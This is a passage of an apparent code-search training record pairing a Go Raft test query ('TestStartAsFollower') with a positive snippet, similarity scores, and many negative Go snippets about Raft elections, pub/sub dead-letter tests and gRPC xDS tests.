\"PUBSUB_AWS_SNSSQS_QUEUE_DLOUT\"\n\t\tStepAsync(deadletterApp, &task,\n\t\t\tdeadLetterReceiverApplication(deadLetterQueueName, msgTimeout, deadLetterConsumerGroup)).\n\n\t\t// Run subscriberApplication - will fail to process messages\n\t\tStep(app.Run(subApp, fmt.Sprintf(\":%d\", appPort+portOffset+4),\n\t\t\tsubscriberApplication(subApp, deadLetterTopicIn, consumerGroup1))).\n\n\t\t// Run the Dapr sidecar with ConsumerID \"PUBSUB_AWS_SNSSQS_TOPIC_DLIN\"\n\t\tStep(sidecar.Run(subAppSideCar,\n\t\t\tappend(componentRuntimeOptions(),\n\t\t\t\tembedded.WithComponentsPath(\"./components/deadletter\"),\n\t\t\t\tembedded.WithAppProtocol(protocol.HTTPProtocol, strconv.Itoa(appPort+portOffset+4)),\n\t\t\t\tembedded.WithDaprGRPCPort(strconv.Itoa(runtime.DefaultDaprAPIGRPCPort+portOffset+4)),\n\t\t\t\tembedded.WithDaprHTTPPort(strconv.Itoa(runtime.DefaultDaprHTTPPort+portOffset+4)),\n\t\t\t\tembedded.WithProfilePort(strconv.Itoa(runtime.DefaultProfilePort+portOffset+4)),\n\t\t\t)...,\n\t\t)).\n\t\tStep(\"publish messages to deadLetterTopicIn ==> \"+deadLetterTopicIn, publishMessages(nil, subAppSideCar, deadLetterTopicIn, deadLetterConsumerGroup)).\n\t\tStep(\"wait\", flow.Sleep(30*time.Second)).\n\t\tStep(\"verify if app1 has 0 recevied messages published to active topic\", assertMessages(10*time.Second, consumerGroup1)).\n\t\tStep(\"verify if app2 has deadletterMessageNum recevied messages send to dead letter queue\", assertMessages(10*time.Second, deadLetterConsumerGroup)).\n\t\tStep(\"reset\", flow.Reset(consumerGroup1, deadLetterConsumerGroup)).\n\t\tRun()\n}", "func (s) TestEDSResourceRemoved(t *testing.T) {\n\t// Start an xDS management server that uses a couple of channels to\n\t// notify the test about the following events:\n\t// - an EDS requested with the expected resource name is requested\n\t// - EDS resource is unrequested, i.e, an EDS request with no resource name\n\t// is received, which indicates that we are not longer interested in that\n\t// resource.\n\tedsResourceRequestedCh := make(chan struct{}, 1)\n\tedsResourceCanceledCh := make(chan struct{}, 1)\n\tmanagementServer, nodeID, bootstrapContents, _, cleanup := e2e.SetupManagementServer(t, e2e.ManagementServerOptions{\n\t\tOnStreamRequest: func(_ int64, req *v3discoverypb.DiscoveryRequest) error {\n\t\t\tif req.GetTypeUrl() == version.V3EndpointsURL {\n\t\t\t\tswitch len(req.GetResourceNames()) {\n\t\t\t\tcase 0:\n\t\t\t\t\tselect {\n\t\t\t\t\tcase edsResourceCanceledCh <- struct{}{}:\n\t\t\t\t\tdefault:\n\t\t\t\t\t}\n\t\t\t\tcase 1:\n\t\t\t\t\tif req.GetResourceNames()[0] == edsServiceName {\n\t\t\t\t\t\tselect {\n\t\t\t\t\t\tcase edsResourceRequestedCh <- struct{}{}:\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\tdefault:\n\t\t\t\t\tt.Errorf(\"Unexpected number of resources, %d, in an EDS request\", len(req.GetResourceNames()))\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t})\n\tdefer cleanup()\n\n\t// Start a test backend and extract its host and port.\n\tserver := stubserver.StartTestService(t, nil)\n\tdefer server.Stop()\n\n\t// Configure cluster and endpoints resources in the management server.\n\tresources := e2e.UpdateOptions{\n\t\tNodeID: nodeID,\n\t\tClusters: []*v3clusterpb.Cluster{e2e.DefaultCluster(clusterName, edsServiceName, e2e.SecurityLevelNone)},\n\t\tEndpoints: []*v3endpointpb.ClusterLoadAssignment{e2e.DefaultEndpoint(edsServiceName, \"localhost\", []uint32{testutils.ParsePort(t, server.Address)})},\n\t\tSkipValidation: true,\n\t}\n\tctx, cancel := context.WithTimeout(context.Background(), defaultTestTimeout)\n\tdefer cancel()\n\tif err := managementServer.Update(ctx, resources); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Create an xDS xdsClient for use by the cluster_resolver LB policy.\n\txdsClient, close, err := xdsclient.NewWithBootstrapContentsForTesting(bootstrapContents)\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to create xDS client: %v\", err)\n\t}\n\tdefer close()\n\n\t// Create a manual resolver and push a service config specifying the use of\n\t// the cds LB policy as the top-level LB policy, and a corresponding config\n\t// with a single cluster.\n\tr := manual.NewBuilderWithScheme(\"whatever\")\n\tjsonSC := fmt.Sprintf(`{\n\t\t\t\"loadBalancingConfig\":[{\n\t\t\t\t\"cds_experimental\":{\n\t\t\t\t\t\"cluster\": \"%s\"\n\t\t\t\t}\n\t\t\t}]\n\t\t}`, clusterName)\n\tscpr := internal.ParseServiceConfig.(func(string) *serviceconfig.ParseResult)(jsonSC)\n\tr.InitialState(xdsclient.SetClient(resolver.State{ServiceConfig: scpr}, xdsClient))\n\n\t// Create a ClientConn and make a successful RPC.\n\tcc, err := grpc.Dial(r.Scheme()+\":///test.service\", grpc.WithTransportCredentials(insecure.NewCredentials()), grpc.WithResolvers(r))\n\tif err != nil {\n\t\tt.Fatalf(\"failed to dial local test server: %v\", err)\n\t}\n\tdefer cc.Close()\n\n\tclient := testgrpc.NewTestServiceClient(cc)\n\tif _, err := client.EmptyCall(ctx, &testpb.Empty{}); err != nil {\n\t\tt.Fatalf(\"rpc EmptyCall() failed: %v\", err)\n\t}\n\n\t// Delete the endpoints resource from the mangement server.\n\tresources.Endpoints = nil\n\tif err := managementServer.Update(ctx, resources); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Ensure that RPCs continue to succeed for the next one second, and that the EDS watch is not canceled.\n\tfor end := time.Now().Add(time.Second); time.Now().Before(end); <-time.After(defaultTestShortTimeout) {\n\t\tif _, err := client.EmptyCall(ctx, &testpb.Empty{}); err != nil {\n\t\t\tt.Fatalf(\"rpc EmptyCall() failed: %v\", err)\n\t\t}\n\t\tselect {\n\t\tcase <-edsResourceCanceledCh:\n\t\t\tt.Fatal(\"EDS watch canceled when not expected to be canceled\")\n\t\tdefault:\n\t\t}\n\t}\n}" ]
[ "0.56858855", "0.53210557", "0.52441114", "0.5125209", "0.5098463", "0.50712526", "0.5064494", "0.5052523", "0.5047018", "0.5040143", "0.50186044", "0.49960944", "0.49875304", "0.49849272", "0.48978335", "0.48863882", "0.4785406", "0.4753413", "0.47414866", "0.47414866", "0.47414866", "0.47414866", "0.47319654", "0.47242472", "0.46947777", "0.46785715", "0.46635598", "0.46566778", "0.46483132", "0.46431547", "0.4604271", "0.4604158", "0.45955613", "0.45858154", "0.45747185", "0.45747185", "0.45747185", "0.45747185", "0.4572675", "0.45617783", "0.453954", "0.45343092", "0.45301104", "0.4512038", "0.45013383", "0.44942084", "0.44888172", "0.44822326", "0.44798198", "0.44441658", "0.44377604", "0.4436778", "0.44277012", "0.44275078", "0.4425258", "0.44079155", "0.44026506", "0.43887612", "0.43851712", "0.43832955", "0.43815646", "0.43736115", "0.43628463", "0.4353685", "0.4352144", "0.43433967", "0.43412545", "0.43389362", "0.43379867", "0.4335862", "0.43334556", "0.4331079", "0.43160963", "0.43159705", "0.43152735", "0.43137267", "0.431261", "0.43116474", "0.43070453", "0.43054295", "0.42851123", "0.42829922", "0.42828226", "0.42819753", "0.42802024", "0.42797032", "0.42714003", "0.42688933", "0.42682895", "0.42645523", "0.4257563", "0.42565078", "0.42506993", "0.42491785", "0.42489406", "0.42468762", "0.42457816", "0.42454702", "0.4238935", "0.4238341" ]
0.78242046
0
TestStartAsFollower tests that when servers start up, they begin as followers. Reference: section 5.2
func TestStartAsFollower(t *testing.T) { r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) if r.state != StateFollower { t.Errorf("state = %s, want %s", r.state, StateFollower) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestSubscribeStreamNotLeader(t *testing.T) {\n\tdefer cleanupStorage(t)\n\n\t// Use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\t// Configure first server.\n\ts1Config := getTestConfig(\"a\", true, 5050)\n\ts1 := runServerWithConfig(t, s1Config)\n\tdefer s1.Stop()\n\n\t// Configure second server.\n\ts2Config := getTestConfig(\"b\", false, 5051)\n\ts2 := runServerWithConfig(t, s2Config)\n\tdefer s2.Stop()\n\n\tgetMetadataLeader(t, 10*time.Second, s1, s2)\n\n\t// Create the stream.\n\tclient, err := lift.Connect([]string{\"localhost:5050\"})\n\trequire.NoError(t, err)\n\tdefer client.Close()\n\n\tname := \"foo\"\n\tsubject := \"foo\"\n\terr = client.CreateStream(context.Background(), subject, name,\n\t\tlift.ReplicationFactor(2))\n\trequire.NoError(t, err)\n\n\trequire.NoError(t, client.Close())\n\n\t// Wait for both nodes to create stream.\n\twaitForPartition(t, 5*time.Second, name, 0, s1, s2)\n\n\t// Connect to the server that is the stream follower.\n\tleader := getPartitionLeader(t, 10*time.Second, name, 0, s1, s2)\n\tvar followerConfig *Config\n\tif leader == s1 {\n\t\tfollowerConfig = s2Config\n\t} else {\n\t\tfollowerConfig = s1Config\n\t}\n\tconn, err := grpc.Dial(fmt.Sprintf(\"localhost:%d\", followerConfig.Port), grpc.WithInsecure())\n\trequire.NoError(t, err)\n\tdefer conn.Close()\n\tapiClient := proto.NewAPIClient(conn)\n\n\t// Subscribe on the follower.\n\tstream, err := apiClient.Subscribe(context.Background(), &proto.SubscribeRequest{Stream: name})\n\trequire.NoError(t, err)\n\t_, err = stream.Recv()\n\trequire.Error(t, err)\n\trequire.Contains(t, err.Error(), \"Server not partition leader\")\n}", "func (t *SelfTester) Start() {}", "func (s *Server) Start() error {\n\teverify := s.Verify()\n\tif everify != nil {\n\t\treturn everify\n\t}\n\n\tif s.Log == nil {\n\t\tle, e := toolkit.NewLog(true, false, \"\", \"\", \"\")\n\t\tif e == nil {\n\t\t\ts.Log = le\n\t\t} else {\n\t\t\treturn errors.New(\"Unable to setup log\")\n\t\t}\n\t}\n\n\tif s.rpcObject == nil {\n\t\ts.rpcObject = new(RPC)\n\t}\n\n\ts.AddFn(\"ping\", func(in toolkit.M) *toolkit.Result {\n\t\tresult := toolkit.NewResult()\n\t\tresult.Data = \"Application Server powered by SebarMod\"\n\t\treturn result\n\t})\n\n\ts.AddFn(\"follow\", func(in toolkit.M) *toolkit.Result {\n\t\tresult := toolkit.NewResult()\n\t\tnodeid := in.GetString(\"nodeid\")\n\t\tif nodeid == \"\" {\n\t\t\treturn result.SetErrorTxt(\"nodeid should not be empty\")\n\t\t}\n\t\tnodeclient := NewClient(nodeid, nil)\n\t\teconnect := nodeclient.Connect()\n\t\tif econnect != nil {\n\t\t\treturn result.SetErrorTxt(\"Can not handshake with client node. \" + econnect.Error())\n\t\t}\n\t\tif s.clients == nil {\n\t\t\ts.clients = map[string]*Client{}\n\t\t}\n\t\ts.clients[nodeid] = nodeclient\n\t\ts.Log.AddLog(toolkit.Sprintf(\"%s has new follower %s\", s.Host, nodeid), \"INFO\")\n \treturn result\n\t})\n\n\ts.AddFn(\"unfollow\", func(in toolkit.M) *toolkit.Result {\n\t\tresult := toolkit.NewResult()\n\t\tnodeid := in.GetString(\"nodeid\")\n\t\tif nodeid == \"\" {\n\t\t\treturn result.SetErrorTxt(\"nodeid should not be empty\")\n\t\t}\n\t\tif s.clients == nil {\n\t\t\ts.clients = map[string]*Client{}\n\t\t}\n\t\tif c, hasClient := s.clients[nodeid]; hasClient {\n\t\t\tc.Close()\n\t\t\tdelete(s.clients, nodeid)\n\t\t}\n\t\ts.Log.AddLog(toolkit.Sprintf(\"Node %s is not following %s any longer\", nodeid, s.Host), \"INFO\")\n \treturn result\n\t})\n\n\ts.Log.Info(\"Starting server \" + s.Host + \". Registered functions are: \" + strings.Join(func() []string {\n\t\tret := []string{}\n\t\tfor k := range s.rpcObject.Fns {\n\t\t\tret = append(ret, k)\n\t\t}\n\t\treturn ret\n\t}(), \", \"))\n\n\ts.rpcServer = rpc.NewServer()\n\ts.rpcServer.Register(s.rpcObject)\n\tl, e := net.Listen(\"tcp\", toolkit.Sprintf(\"%s\", s.Host))\n\tif e != nil {\n\t\treturn e\n\t}\n\n\ts.listener = l\n\tgo func() {\n\t\ts.rpcServer.Accept(l)\n\t}()\n\treturn nil\n}", "func TestRaftNetworkPartition(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftNetworkPartition\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n3 node.\n\tfsm3 := newTestFSM(ID3)\n\tcfg = getTestConfig(ID3, clusterPrefix+ID3)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn3 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn3.transport = NewMsgDropper(n3.transport, 111, 0)\n\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn3.Start(fsm3)\n\tn3.ProposeInitialMembership([]string{ID1, ID2, ID3})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower1, follower2 *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower1 = n2\n\t\tfollower2 = n3\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower1 = n1\n\t\tfollower2 = n3\n\tcase <-fsm3.leaderCh:\n\t\tleader = n3\n\t\tfollower1 = n1\n\t\tfollower2 = n2\n\t}\n\n\t// Propose a command on the leader.\n\tpending := leader.Propose([]byte(\"I'm data1\"))\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tt.Fatalf(\"Failed to propose command on leader side: %v\", pending.Err)\n\t}\n\n\t// Isolate the leader with follower1.\n\tleader.transport.(*msgDropper).Set(follower1.config.ID, 1)\n\tfollower1.transport.(*msgDropper).Set(leader.config.ID, 1)\n\t// Isolate the leader with follower2.\n\tleader.transport.(*msgDropper).Set(follower2.config.ID, 1)\n\tfollower2.transport.(*msgDropper).Set(leader.config.ID, 1)\n\n\t// Propose a second command on the partitioned leader.\n\tpending = leader.Propose([]byte(\"I'm data2\"))\n\n\t// Wait a new leader gets elected on the other side of the partition.\n\tvar newLeader *Raft\n\tselect {\n\tcase <-follower1.fsm.(*testFSM).leaderCh:\n\t\tnewLeader = follower1\n\tcase <-follower2.fsm.(*testFSM).leaderCh:\n\t\tnewLeader = follower2\n\t}\n\n\t// The partitioned leader should step down at some point and conclude the\n\t// command proposed after the network partition with 'ErrNotLeaderAnymore'.\n\t<-pending.Done\n\tif pending.Err != ErrNotLeaderAnymore {\n\t\tt.Fatalf(\"expected 'ErrNotLeaderAnymore' for the command proposed on partitioned leader\")\n\t}\n\n\t// Propose a new command on the newly elected leader, it should succeed.\n\tpending = newLeader.Propose([]byte(\"I'm data3\"))\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tt.Fatalf(\"Failed to propose on new leader side: %v\", pending.Err)\n\t}\n\n\t// Reconnect old leader and previous follower 1.\n\tleader.transport.(*msgDropper).Set(follower1.config.ID, 0)\n\tfollower1.transport.(*msgDropper).Set(leader.config.ID, 0)\n\t// Reconnect old leader and previous follower 2.\n\tleader.transport.(*msgDropper).Set(follower2.config.ID, 0)\n\tfollower2.transport.(*msgDropper).Set(leader.config.ID, 0)\n\n\t// At some point the old leader should join the new quorum and gets synced\n\t// from the new leader.\n\ttestEntriesEqual(\n\t\tleader.fsm.(*testFSM).appliedCh,\n\t\tnewLeader.fsm.(*testFSM).appliedCh, 2,\n\t)\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func TestRaft1(t *testing.T) {\n\n\t//Remove any state recovery files\n\tfor i := 0; i < 5; i++ {\n\t\tos.Remove(fmt.Sprintf(\"%s_S%d.state\", raft.FILENAME, i))\n\t}\n\n\tgo main() //Starts all servers\n\n\tvar leaderId1, leaderId2 int\n\tack := make(chan bool)\n\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId1 = raft.KillLeader() //Kill leader\n\t\tlog.Print(\"Killed leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(2*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId2 = raft.KillLeader() //Kill current leader again\n\t\tlog.Print(\"Killed leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServer(leaderId2) //Resurrect last killed as follower\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(4*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServerAsLeader(leaderId1) //Ressurect first one as leader\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(5*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tack <- true\n\t})\n\n\t<-ack\n}", "func (tester *FollowTester) follow(t *testing.T, d *Dandelion) {\n\ta := assert.New(t)\n\ta.NoError(tester.acc0.SendTrxAndProduceBlock(Follow(tester.acc0.Name, tester.acc1.Name, false)))\n}", "func TestStart(t *testing.T) {\n\ts := SetUpSuite(t)\n\n\t// Fetch the services.App that the service heartbeat.\n\tservers, err := s.authServer.AuthServer.GetApplicationServers(s.closeContext, defaults.Namespace)\n\trequire.NoError(t, err)\n\n\t// Check that the services.Server sent via heartbeat is correct. For example,\n\t// check that the dynamic labels have been evaluated.\n\tappFoo, err := types.NewAppV3(types.Metadata{\n\t\tName: \"foo\",\n\t\tLabels: staticLabels,\n\t}, types.AppSpecV3{\n\t\tURI: s.testhttp.URL,\n\t\tPublicAddr: \"foo.example.com\",\n\t\tDynamicLabels: map[string]types.CommandLabelV2{\n\t\t\tdynamicLabelName: {\n\t\t\t\tPeriod: dynamicLabelPeriod,\n\t\t\t\tCommand: dynamicLabelCommand,\n\t\t\t\tResult: \"4\",\n\t\t\t},\n\t\t},\n\t})\n\trequire.NoError(t, err)\n\tserverFoo, err := types.NewAppServerV3FromApp(appFoo, \"test\", s.hostUUID)\n\trequire.NoError(t, err)\n\tappAWS, err := types.NewAppV3(types.Metadata{\n\t\tName: \"awsconsole\",\n\t\tLabels: staticLabels,\n\t}, types.AppSpecV3{\n\t\tURI: constants.AWSConsoleURL,\n\t\tPublicAddr: \"aws.example.com\",\n\t})\n\trequire.NoError(t, err)\n\tserverAWS, err := types.NewAppServerV3FromApp(appAWS, \"test\", s.hostUUID)\n\trequire.NoError(t, err)\n\n\tsort.Sort(types.AppServers(servers))\n\trequire.Empty(t, cmp.Diff([]types.AppServer{serverAWS, serverFoo}, servers,\n\t\tcmpopts.IgnoreFields(types.Metadata{}, \"ID\", \"Expires\")))\n\n\t// Check the expiry time is correct.\n\tfor _, server := range servers {\n\t\trequire.True(t, s.clock.Now().Before(server.Expiry()))\n\t\trequire.True(t, s.clock.Now().Add(2*defaults.ServerAnnounceTTL).After(server.Expiry()))\n\t}\n}", "func TestLeaderTransferToUpToDateNodeFromFollower(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (r *Raft) runFollower() {\n\tfor {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\t// Handle the command\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\tr.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\tr.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"In follower state, got unexpected command: %#v\", rpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\t\tcase <-randomTimeout(r.conf.HeartbeatTimeout, r.conf.ElectionTimeout):\n\t\t\t// Heartbeat failed! Go to the candidate state\n\t\t\tr.logW.Printf(\"Heartbeat timeout, start election process\")\n\t\t\tr.setState(Candidate)\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (rf *Raft) follower() {\n\tgo rf.startElectionTimer()\n}", "func (m *TestFixClient) Start() error {\n\treturn m.initiator.Start()\n}", "func TestStart(t *testing.T) {\n\t// Preparation\n\tdir, err := os.Getwd()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdir = dir + \"/../assets\" // path to your tracks for testing\n\n\tlib, err := library.NewLibrary(\"MyLibrary\", dir)\n\tif err != nil {\n\t\tt.Errorf(\"initialize library with valid params: %s\", err.Error())\n\t}\n\n\terr = lib.ScanWithRoutines()\n\tif err != nil {\n\t\tt.Errorf(\"scan library: %s\", err.Error())\n\t}\n\n\t// Test\n\tp := player.NewPlayer(lib, make(chan request.Request, 1000))\n\n\tvar requests = []request.RequestType{\n\t\trequest.RequestNextTrack,\n\t\trequest.RequestNextTrack,\n\t\trequest.RequestNextTrack,\n\t\trequest.RequestPrevTrack,\n\t\trequest.RequestPrevTrack,\n\t\trequest.RequestRepeatMode,\n\t}\n\tch := p.Start(make(chan string, 1000))\n\tfor _, req := range requests {\n\t\tch <- request.NewRequestToPlayer(req)\n\t\ttime.Sleep(3 * time.Second)\n\t}\n\t// time.Sleep(1000*time.Second)\n\t// Another process is started on the backend, this process can exit naturally.\n}", "func TestPartition(t *testing.T) {\n\traftConf := &RaftConfig{MemberRegSocket: \"127.0.0.1:8124\", PeerSocket: \"127.0.0.1:9987\", TimeoutInMillis: 1500, HbTimeoutInMillis: 150, LogDirectoryPath: \"logs1\", StableStoreDirectoryPath: \"./stable1\", RaftLogDirectoryPath: \"../LocalLog1\"}\n\n\t// delete stored state to avoid unnecessary effect on following test cases\n\tinitState(raftConf.StableStoreDirectoryPath, raftConf.LogDirectoryPath, raftConf.RaftLogDirectoryPath)\n\n\t// launch cluster proxy servers\n\tcluster.NewProxyWithConfig(RaftToClusterConf(raftConf))\n\n\tfmt.Println(\"Started Proxy\")\n\n\ttime.Sleep(100 * time.Millisecond)\n\n\tserverCount := 5\n\traftServers := make([]raft.Raft, serverCount+1)\n\tpseudoClusters := make([]*test.PseudoCluster, serverCount+1)\n\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\t// create cluster.Server\n\t\tclusterServer, err := cluster.NewWithConfig(i, \"127.0.0.1\", 8500+i, RaftToClusterConf(raftConf))\n\t\tpseudoCluster := test.NewPseudoCluster(clusterServer)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating cluster server. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tlogStore, err := llog.Create(raftConf.RaftLogDirectoryPath + \"/\" + strconv.Itoa(i))\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating log. \" + err.Error())\n\t\t\treturn\n\t\t}\n\n\t\ts, err := NewWithConfig(pseudoCluster, logStore, raftConf)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Error in creating Raft servers. \" + err.Error())\n\t\t\treturn\n\t\t}\n\t\traftServers[i] = s\n\t\tpseudoClusters[i] = pseudoCluster\n\t}\n\n\t// wait for leader to be elected\n\ttime.Sleep(20 * time.Second)\n\tcount := 0\n\toldLeader := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\toldLeader = i\n\t\t\tcount++\n\t\t}\n\t}\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in 1 minute\")\n\t\treturn\n\t}\n\n\t// isolate Leader and any one follower\n\tfollower := 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tif i != oldLeader {\n\t\t\tfollower = i\n\t\t\tbreak\n\t\t}\n\t}\n\tfmt.Println(\"Server \" + strconv.Itoa(follower) + \" was chosen as follower in minority partition\")\n\tfor i := 1; i <= serverCount; i += 1 {\n\t\tpseudoClusters[oldLeader].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[oldLeader].AddToOutboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToOutboxFilter(raftServers[i].Pid())\n\t}\n\n\tpseudoClusters[oldLeader].AddToOutboxFilter(cluster.BROADCAST)\n\tpseudoClusters[follower].AddToOutboxFilter(cluster.BROADCAST)\n\n\t// wait for other servers to discover that leader\n\t// has crashed and to elect a new leader\n\ttime.Sleep(20 * time.Second)\n\n\tcount = 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\n\t\tif i != oldLeader && i != follower && raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\tfmt.Println(\"Server \" + strconv.Itoa(i) + \" was chosen as new leader in majority partition.\")\n\t\t\tcount++\n\t\t}\n\t}\n\t// new leader must be chosen\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in majority partition\")\n\t}\n}", "func TestRaftNewLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftNewLeader\"\n\n\t// Create n1 node.\n\tstorage := NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm1 := newTestFSM(ID1)\n\t// NOTE we use different cluster ID for nodes within same cluster to avoid\n\t// registering same metric path twice. This should never happen in real world\n\t// because we'll never run nodes of a same cluster within one process.\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), storage)\n\t// Create n2 node.\n\tstorage = NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), storage)\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Wait until a leader is elected.\n\tselect {\n\tcase <-fsm1.leaderCh:\n\tcase <-fsm2.leaderCh:\n\t}\n}", "func (m *MsgPing) Follower(interfaces.IState) bool {\n\treturn true\n}", "func (handler *RuleHandler) FollowerOnAddServer(msg iface.MsgAddServer, log iface.RaftLog, status iface.Status) []interface{} {\n\t// leader should be responsible for this\n\treturn []interface{}{iface.ReplyNotLeader{}}\n}", "func (s *Server) startEnterpriseLeader() {}", "func (r *Raft) startReplication(state *leaderState, peer net.Addr) {\n\ts := &followerReplication{\n\t\tpeer: peer,\n\t\tinflight: state.inflight,\n\t\tstopCh: make(chan struct{}),\n\t\ttriggerCh: make(chan struct{}, 1),\n\t\tmatchIndex: r.getLastLogIndex(),\n\t\tnextIndex: r.getLastLogIndex() + 1,\n\t}\n\tstate.replicationState[peer.String()] = s\n\tgo r.replicate(s)\n}", "func (r *Raft) becomeFollower(term uint64, lead uint64) {\n\t// Your Code Here (2A).\n\tr.State = StateFollower\n\tr.Term = term\n\tr.Lead = lead\n\tr.Vote = r.Lead\n\tr.electionElapsed = 0\n\tr.actualElectionTimeout = rand.Intn(r.electionTimeout) + r.electionTimeout\n\tr.leadTransferee = None\n}", "func (c PeerRpc) AddFollower(msg node.ModFollowerListMsg, _ignored *string) error {\n\terr := node.ModifyFollowerList(msg, true)\n\treturn err\n}", "func (r *Raft) becomeFollower(term uint64, lead uint64) {\n\tr.State = 